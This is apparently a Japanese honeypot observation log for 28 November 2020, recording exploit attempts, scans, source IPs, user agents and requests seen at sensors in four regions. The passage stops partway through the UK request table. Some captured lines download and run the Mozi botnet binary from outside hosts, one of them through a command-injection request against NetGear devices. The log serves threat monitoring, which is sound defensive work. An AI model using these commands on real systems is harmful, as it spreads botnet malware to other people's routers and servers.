2020/11/28 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2020/11/28分です。

特徴

Location：JP

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
112[.]124[.]42[.]80に関する不正通信
123[.]125[.]114[.]144に関する不正通信
を確認しました。

Location：US

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
112[.]124[.]42[.]80に関する不正通信
を確認しました。

Location：UK

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Zyxelルータの脆弱性を狙うアクセス
B4ckdoor-owned-youによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
112[.]124[.]42[.]80に関する不正通信
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//125[.]26[.]241[.]203:45027/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//205[.]236[.]184[.]238:35121/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：SG

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
ApiToolによるスキャン行為
TBI-WebScannerによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。

他

アクセス数推移

JP：総アクセス数：174 (前日比：+105)
US：総アクセス数：270 (前日比：+232)
UK：総アクセス数：291 (前日比：-34)
SG：総アクセス数：47 (前日比：-105)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	2.57.122.186	Romania
1	20.46.166.202	United States
2	35.202.184.38	United States
1	39.64.191.110	China
3	46.232.249.138	Germany
1	49.118.193.176	China
1	52.86.164.88	United States
1	60.191.125.35	China
8	62.210.119.253	France
1	64.31.8.10	United States
18	91.241.19.84	Russia
1	96.126.109.146	United States
1	101.0.38.133	India
1	111.224.235.167	China
1	111.224.249.96	China
1	112.230.41.115	China
1	113.58.228.33	China
1	113.120.10.60	China
1	124.227.31.48	China
1	137.220.39.199	United States
1	171.34.176.107	China
1	172.105.89.161	United States
1	185.172.110.235	Netherlands
1	192.241.233.233	United States
1	192.241.239.103	United States
119	202.90.135.30	Philippines
1	221.13.12.204	China
1	221.213.75.103	China

UserAgent一覧

件数	UserAgent
4	-
3	Go-http-client/1.1
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
6	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
119	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
18	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
4	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2	Mozilla/5.0 zgrab/0.x
1	Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36
4	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
8	python-requests/2.24.0

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x16\x03\x01
1	CONNECT	cn[.]bing[.]com/:443	HTTP/1.1
1	CONNECT	www[.]baidu[.]com/:443	HTTP/1.1
1	CONNECT	www[.]ipip[.]net/:443	HTTP/1.1
1	CONNECT	www[.]voanews[.]com/:443	HTTP/1.1
9	GET	/.env	HTTP/1.1
1	GET	/.git/config	HTTP/1.1
1	GET	/2phpmyadmin/index.php?lang=en	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/MyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/PMA/index.php?lang=en	HTTP/1.1
1	GET	/PMA2011/index.php?lang=en	HTTP/1.1
1	GET	/PMA2012/index.php?lang=en	HTTP/1.1
1	GET	/PMA2013/index.php?lang=en	HTTP/1.1
1	GET	/PMA2014/index.php?lang=en	HTTP/1.1
1	GET	/PMA2015/index.php?lang=en	HTTP/1.1
1	GET	/PMA2016/index.php?lang=en	HTTP/1.1
1	GET	/PMA2017/index.php?lang=en	HTTP/1.1
1	GET	/PMA2018/index.php?lang=en	HTTP/1.1
1	GET	/PMA2019/index.php?lang=en	HTTP/1.1
1	GET	/PMA2020/index.php?lang=en	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/admin/db/index.php?lang=en	HTTP/1.1
1	GET	/admin/index.php?lang=en	HTTP/1.1
1	GET	/admin/pMA/index.php?lang=en	HTTP/1.1
1	GET	/admin/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/sqladmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/sysadmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/web/index.php?lang=en	HTTP/1.1
1	GET	/administrator/PMA/index.php?lang=en	HTTP/1.1
1	GET	/administrator/admin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/db/index.php?lang=en	HTTP/1.1
1	GET	/administrator/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/pma/index.php?lang=en	HTTP/1.1
1	GET	/administrator/web/index.php?lang=en	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
1	GET	/database/index.php?lang=en	HTTP/1.1
1	GET	/db/db-admin/index.php?lang=en	HTTP/1.1
1	GET	/db/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/dbweb/index.php?lang=en	HTTP/1.1
1	GET	/db/index.php?lang=en	HTTP/1.1
1	GET	/db/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin3/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/db/webadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/webdb/index.php?lang=en	HTTP/1.1
1	GET	/db/websql/index.php?lang=en	HTTP/1.1
1	GET	/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/index.php?lang=en	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/manager/text/list	HTTP/1.1
1	GET	/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql-admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/db/index.php?lang=en	HTTP/1.1
1	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/index.php?lang=en	HTTP/1.1
1	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/pMA/index.php?lang=en	HTTP/1.1
1	GET	/mysql/pma/index.php?lang=en	HTTP/1.1
1	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/web/index.php?lang=en	HTTP/1.1
1	GET	/mysqladmin/index.php?lang=en	HTTP/1.1
1	GET	/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/php-my-admin/index.php?lang=en	HTTP/1.1
1	GET	/php-myadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin1/index.php?lang=en	HTTP/1.1
2	GET	/phpMyAdmin2/index.php?lang=en	HTTP/1.1
2	GET	/phpMyAdmin3/index.php?lang=en	HTTP/1.1
2	GET	/phpMyAdmin4/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin5/index.php?lang=en	HTTP/1.1
1	GET	/phpMyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmy-admin/index.php?lang=en	HTTP/1.1
1	GET	/phpmy/index.php?lang=en	HTTP/1.1
1	GET	/phpmyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin1/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2011/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2012/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2013/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2014/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2015/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2016/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2017/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2018/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2019/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2020/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin4/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin5/index.php?lang=en	HTTP/1.1
1	GET	/phppma/index.php?lang=en	HTTP/1.1
1	GET	/pma/index.php?lang=en	HTTP/1.1
1	GET	/pma2011/index.php?lang=en	HTTP/1.1
1	GET	/pma2012/index.php?lang=en	HTTP/1.1
1	GET	/pma2013/index.php?lang=en	HTTP/1.1
1	GET	/pma2014/index.php?lang=en	HTTP/1.1
1	GET	/pma2015/index.php?lang=en	HTTP/1.1
1	GET	/pma2016/index.php?lang=en	HTTP/1.1
1	GET	/pma2017/index.php?lang=en	HTTP/1.1
1	GET	/pma2018/index.php?lang=en	HTTP/1.1
1	GET	/pma2019/index.php?lang=en	HTTP/1.1
1	GET	/pma2020/index.php?lang=en	HTTP/1.1
1	GET	/program/index.php?lang=en	HTTP/1.1
1	GET	/shopdb/index.php?lang=en	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/sql/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/php-myadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpMyAdmin2/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmanager/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmy-admin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/sql/sql-admin/index.php?lang=en	HTTP/1.1
1	GET	/sql/sql/index.php?lang=en	HTTP/1.1
1	GET	/sql/sqladmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/sqlweb/index.php?lang=en	HTTP/1.1
1	GET	/sql/webadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/webdb/index.php?lang=en	HTTP/1.1
1	GET	/sql/websql/index.php?lang=en	HTTP/1.1
1	GET	/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/v2/_catalog	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot_.php	HTTP/1.1
4	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	http[:]//boxun[.]com/	HTTP/1.1
1	GET	http[:]//www[.]123cha[.]com/	HTTP/1.1
1	GET	http[:]//www[.]epochtimes[.]com/	HTTP/1.1
1	GET	http[:]//www[.]minghui[.]org/	HTTP/1.1
1	GET	http[:]//www[.]rfa[.]org/english/	HTTP/1.1
1	GET	http[:]//www[.]wujieliulan[.]com/	HTTP/1.1
1	HEAD	http[:]//112[.]124[.]42[.]80:63435/	HTTP/1.1
1	HEAD	http[:]//123[.]125[.]114[.]144/	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
1	POST	/HNAP1/	HTTP/1.0
2	POST	/api/jsonws/invoke	HTTP/1.1
2	POST	/boaform/admin/formLogin	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1		\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
4	2.57.122.186	Romania
1	23.129.64.180	United States
1	23.129.64.185	United States
2	34.105.89.188	United States
1	60.191.125.35	China
18	91.241.19.84	Russia
119	96.224.237.56	United States
1	104.168.21.170	United States
1	120.26.38.159	China
1	123.4.254.207	China
3	129.28.157.97	China
1	159.65.7.234	United States
6	163.172.168.251	United Kingdom
1	172.105.89.161	United States
1	172.245.211.58	United States
1	185.132.53.84	Germany
1	185.172.110.235	Netherlands
2	185.202.2.32	Russia
101	191.37.178.75	Brazil
1	192.241.235.68	United States
1	192.241.235.138	United States
1	192.241.237.158	United States
1	220.77.98.202	South Korea

UserAgent一覧

件数	UserAgent
9	-
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 OPR/53.0.2907.68
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
101	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
119	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
18	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (Windows NT 6.0; rv:55.0.2) Gecko/20100101 Firefox/55.0.2
4	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2	Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
3	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
2		\x03
1		\x16\x03\x01
2	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
1	GET	/.env	HTTP/1.1
1	GET	/2phpmyadmin/index.php?lang=en	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/MyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/PMA/index.php?lang=en	HTTP/1.1
1	GET	/PMA2011/index.php?lang=en	HTTP/1.1
1	GET	/PMA2012/index.php?lang=en	HTTP/1.1
1	GET	/PMA2013/index.php?lang=en	HTTP/1.1
1	GET	/PMA2014/index.php?lang=en	HTTP/1.1
1	GET	/PMA2015/index.php?lang=en	HTTP/1.1
1	GET	/PMA2016/index.php?lang=en	HTTP/1.1
1	GET	/PMA2017/index.php?lang=en	HTTP/1.1
1	GET	/PMA2018/index.php?lang=en	HTTP/1.1
1	GET	/PMA2019/index.php?lang=en	HTTP/1.1
1	GET	/PMA2020/index.php?lang=en	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/public/index.php	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/admin/db/index.php?lang=en	HTTP/1.1
1	GET	/admin/index.php?lang=en	HTTP/1.1
1	GET	/admin/pMA/index.php?lang=en	HTTP/1.1
1	GET	/admin/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/sqladmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/sysadmin/index.php?lang=en	HTTP/1.1
1	GET	/admin/web/index.php?lang=en	HTTP/1.1
1	GET	/administrator/PMA/index.php?lang=en	HTTP/1.1
1	GET	/administrator/admin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/db/index.php?lang=en	HTTP/1.1
1	GET	/administrator/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/administrator/pma/index.php?lang=en	HTTP/1.1
1	GET	/administrator/web/index.php?lang=en	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=admin&psd=admin	HTTP/1.0
4	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
1	GET	/database/index.php?lang=en	HTTP/1.1
1	GET	/db/db-admin/index.php?lang=en	HTTP/1.1
1	GET	/db/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/dbweb/index.php?lang=en	HTTP/1.1
1	GET	/db/index.php?lang=en	HTTP/1.1
1	GET	/db/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpMyAdmin3/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/db/webadmin/index.php?lang=en	HTTP/1.1
1	GET	/db/webdb/index.php?lang=en	HTTP/1.1
1	GET	/db/websql/index.php?lang=en	HTTP/1.1
1	GET	/dbadmin/index.php?lang=en	HTTP/1.1
2	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?lang=en	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/manager/text/list	HTTP/1.1
1	GET	/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql-admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/db/index.php?lang=en	HTTP/1.1
1	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/index.php?lang=en	HTTP/1.1
1	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/pMA/index.php?lang=en	HTTP/1.1
1	GET	/mysql/pma/index.php?lang=en	HTTP/1.1
1	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/web/index.php?lang=en	HTTP/1.1
1	GET	/mysqladmin/index.php?lang=en	HTTP/1.1
1	GET	/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/php-my-admin/index.php?lang=en	HTTP/1.1
1	GET	/php-myadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin-3/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin1/index.php?lang=en	HTTP/1.1
2	GET	/phpMyAdmin2/index.php?lang=en	HTTP/1.1
2	GET	/phpMyAdmin3/index.php?lang=en	HTTP/1.1
2	GET	/phpMyAdmin4/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin5/index.php?lang=en	HTTP/1.1
1	GET	/phpMyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmy-admin/index.php?lang=en	HTTP/1.1
1	GET	/phpmy/index.php?lang=en	HTTP/1.1
1	GET	/phpmyAdmin/index.php?lang=en	HTTP/1.1
101	GET	/phpmyadmin/	HTTP/1.1
1	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin1/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2011/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2012/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2013/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2014/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2015/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2016/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2017/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2018/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2019/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2020/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin4/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin5/index.php?lang=en	HTTP/1.1
1	GET	/phppma/index.php?lang=en	HTTP/1.1
1	GET	/pma/index.php?lang=en	HTTP/1.1
1	GET	/pma2011/index.php?lang=en	HTTP/1.1
1	GET	/pma2012/index.php?lang=en	HTTP/1.1
1	GET	/pma2013/index.php?lang=en	HTTP/1.1
1	GET	/pma2014/index.php?lang=en	HTTP/1.1
1	GET	/pma2015/index.php?lang=en	HTTP/1.1
1	GET	/pma2016/index.php?lang=en	HTTP/1.1
1	GET	/pma2017/index.php?lang=en	HTTP/1.1
1	GET	/pma2018/index.php?lang=en	HTTP/1.1
1	GET	/pma2019/index.php?lang=en	HTTP/1.1
1	GET	/pma2020/index.php?lang=en	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/program/index.php?lang=en	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//220[.]77[.]98[.]202:51128/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shopdb/index.php?lang=en	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/sql/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/php-myadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpMyAdmin2/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmanager/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmy-admin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/sql/sql-admin/index.php?lang=en	HTTP/1.1
1	GET	/sql/sql/index.php?lang=en	HTTP/1.1
1	GET	/sql/sqladmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/sqlweb/index.php?lang=en	HTTP/1.1
1	GET	/sql/webadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/webdb/index.php?lang=en	HTTP/1.1
1	GET	/sql/websql/index.php?lang=en	HTTP/1.1
1	GET	/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
2	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	HEAD	http[:]//112[.]124[.]42[.]80:63435/	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
2	POST	/api/jsonws/invoke	HTTP/1.1
4	POST	/boaform/admin/formLogin	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//rosamoss[.]fun/1344fed055987f9eb87aef70de1922ae7239d57b2a38fd9fb91a2a3f0b4c497a798e4bac454e2423e29c9ed736680209fc9db4411b67b0dc89d46463e8b7633d79530f2c5d99b75342c0a7c55aa3fd6776436e843be01b99bd777b1f804fc0db	HTTP/1.1
1	POST	http[:]//rosamoss[.]fun/82396aa34d3d216d4a545cf6f34c62f84985d669d5384686caa9a5de4bc2ef3e17c4a8631f4e6dbc84f1ffe83607d5e43f9f5a0c9833ca40b09b75286001d5cd82f4cca0a7179c575ad604b916db3a8fb5981b587225ee9d1eb5307d2683bf0d	HTTP/1.1
1		\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
3	2.57.122.186	Romania
1	23.94.160.107	United States
2	35.237.79.25	United States
1	60.191.125.35	China
1	61.219.11.153	Taiwan
1	66.240.205.34	United States
1	91.234.62.16	Russia
18	91.241.19.84	Russia
1	103.41.27.244	India
1	103.145.13.129	India
46	109.226.225.1	Russia
1	120.76.22.182	China
101	120.157.81.204	Australia
101	123.160.165.128	China
1	125.26.241.203	Thailand
1	128.106.166.8	Singapore
1	182.127.2.131	China
2	185.142.236.34	Netherlands
1	185.172.110.235	Netherlands
1	191.235.93.150	Brazil
1	192.241.232.227	United States
1	192.241.239.126	United States
1	192.241.239.229	United States
1	198.199.92.246	United States
1	205.236.184.238	Canada

UserAgent一覧

件数	UserAgent
8	-
2	B4ckdoor-owned-you
3	Hello, world
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
202	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
46	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
18	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
1	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
4	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
1		Gh0st\xad
1		\x16\x03\x01
1	GET	/.env	HTTP/1.1
1	GET	/2phpmyadmin/index.php?lang=en	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
